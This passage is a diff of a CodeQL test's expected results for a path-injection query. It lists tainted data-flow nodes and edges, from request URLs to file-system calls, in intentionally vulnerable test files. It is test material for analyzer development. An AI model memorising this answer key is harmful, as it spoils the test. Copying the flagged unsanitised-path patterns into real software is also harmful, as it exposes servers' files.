| pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... 
).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... 
, path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... 
c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | | examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | | examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | | express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | | handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | | handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | 
@@ -440,22 +440,22 @@ nodes | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | | tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | | tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... 
rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | 
@@ -504,158 +504,158 @@ nodes | typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | | views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... 
ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... 
, true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... 
